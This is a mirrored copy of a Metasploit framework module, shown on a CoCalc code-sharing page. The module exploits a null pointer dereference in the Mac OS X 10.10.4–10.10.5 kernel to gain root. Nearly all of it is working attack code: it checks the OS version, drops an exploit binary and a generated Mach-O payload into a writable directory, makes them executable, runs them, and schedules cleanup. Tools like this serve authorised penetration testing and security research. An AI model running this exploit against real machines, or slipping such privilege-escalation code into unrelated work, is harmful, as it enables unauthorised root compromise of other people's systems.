Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/tpwn.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mac OS X "tpwn" Privilege Escalation',

20
        'Description' => %q{

21
          This module exploits a null pointer dereference in XNU to escalate

22
          privileges to root.

23


24
          Tested on 10.10.4 and 10.10.5.

25
        },

26
        'Author' => [

27
          'qwertyoruiop', # Vulnerability discovery and PoC

28
          'wvu'           # Copy/paste monkey

29
        ],

30
        'References' => [

31
          ['URL', 'https://github.com/kpwn/tpwn']

32
        ],

33
        'DisclosureDate' => '2015-08-16',

34
        'License' => MSF_LICENSE,

35
        'Platform' => 'osx',

36
        'Arch' => ARCH_X64,

37
        'SessionTypes' => ['shell'],

38
        'Privileged' => true,

39
        'Targets' => [

40
          ['Mac OS X 10.10.4-10.10.5', {}]

41
        ],

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_advanced_options [

52
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])

53
    ]

54
  end

55


56
  def base_dir

57
    datastore['WritableDir'].to_s

58
  end

59


60
  def check

61
    ver? ? CheckCode::Appears : CheckCode::Safe

62
  end

63


64
  def exploit

65
    if is_root?

66
      fail_with Failure::BadConfig, 'Session already has root privileges'

67
    end

68


69
    if check != CheckCode::Appears

70
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

71
    end

72


73
    unless writable? base_dir

74
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

75
    end

76


77
    print_status("Writing exploit to `#{exploit_file}'")

78
    write_file(exploit_file, binary_exploit)

79
    register_file_for_cleanup(exploit_file)

80


81
    print_status("Writing payload to `#{payload_file}'")

82
    write_file(payload_file, binary_payload)

83
    register_file_for_cleanup(payload_file)

84


85
    print_status('Executing exploit...')

86
    cmd_exec(sploit)

87
    print_status('Executing payload...')

88
    cmd_exec(payload_file)

89
  end

90


91
  def ver?

92
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(

93
      Rex::Version.new('10.10.4'), Rex::Version.new('10.10.5')

94
    )

95
  end

96


97
  def sploit

98
    "chmod +x #{exploit_file} #{payload_file} && #{exploit_file}"

99
  end

100


101
  def binary_exploit

102
    File.read(File.join(

103
      Msf::Config.data_directory, 'exploits', 'tpwn', 'tpwn'

104
    ))

105
  end

106


107
  def binary_payload

108
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

109
  end

110


111
  def exploit_file

112
    @exploit_file ||=

113
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

114
  end

115


116
  def payload_file

117
    @payload_file ||=

118
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"

119
  end

120
end

121


122